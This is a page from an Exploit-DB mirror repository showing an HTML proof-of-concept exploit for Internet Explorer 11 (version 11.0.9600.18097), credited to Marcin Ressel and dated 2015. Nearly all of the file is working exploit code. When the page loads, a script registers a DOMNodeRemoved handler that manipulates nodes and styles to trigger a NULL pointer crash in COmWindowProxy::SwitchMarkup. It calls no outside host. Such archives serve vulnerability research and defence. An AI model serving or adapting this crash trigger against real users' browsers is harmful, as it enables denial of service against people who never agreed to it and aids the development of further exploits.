bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/38916.html
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

58 lines
No EOL
2.5 KiB
HTML
Raw Permalink Blame History

<!doctype html>
<html>
<head>
<meta http-equiv='Cache-Control' content='no-cache'/>
<title>IE11 11.0.9600.18097 NULL PTR</title>
<script>
/*
* Exploit Title: IE 11 COmWindowProxy::SwitchMarkup NULL PTR
* Date: 09.12.2015
* Exploit Author: Marcin Ressel
* Vendor Homepage: www.microsoft.com
* Software Link: 0
* Version: 11.0.9600.18097
* Tested on: Windows 7 x64
* https://twitter.com/m_ressel
*/
var trg,src,arg;
function tk() {
targetDomTree = document.getElementsByTagName("*");
var meta = document.createElement('meta');
meta.setAttribute("http-equiv", "X-UA-Compatible");
meta.setAttribute("content",'IE=10');
document.getElementsByTagName("head")[0].appendChild(meta);
doc = document;
src = targetDomTree[8];
trg = targetDomTree[1];
arg = targetDomTree[0];
arg.addEventListener("DOMNodeRemoved",new Function("",
'try{src.runtimeStyle.textAlignLast="center";}catch(err){}'+
'try{trg = arg.removeNode(true);}catch(err){}'+
'try{trg.parentNode.style.textAutospace="ideograph-numeric";}catch(err){}'+
'try{trg.runtimeStyle="align-items:stretch;";}catch(err){}'+
'try{trg.insertAdjacentHTML("afterEnd","<table><tfoot>http://www.w3.org/2000/xmlns/</tfoot></table>");}catch(err){}'+
'try{trg.parentElement.parentNode.style.wordWrap="initial";}catch(err){}'+
'try{trg.parentNode.style.writingMode="vertical-rl";}catch(err){}'+
'try{doc.write("");}catch(err){}try{trg.style.whiteSpace="pre"; }catch(err){}'
),
true);
trg.outerText = new Object();
trg.parentNode.appendChild(document.createElement("div"));
}
</script>
</head>
<body onload='tk();'>
<div id="out">..</div>
<div id="oneUnArg">...</div>
<div id="pHolder"></div>
</body>
</html>
Reference in a new issue View git blame Copy permalink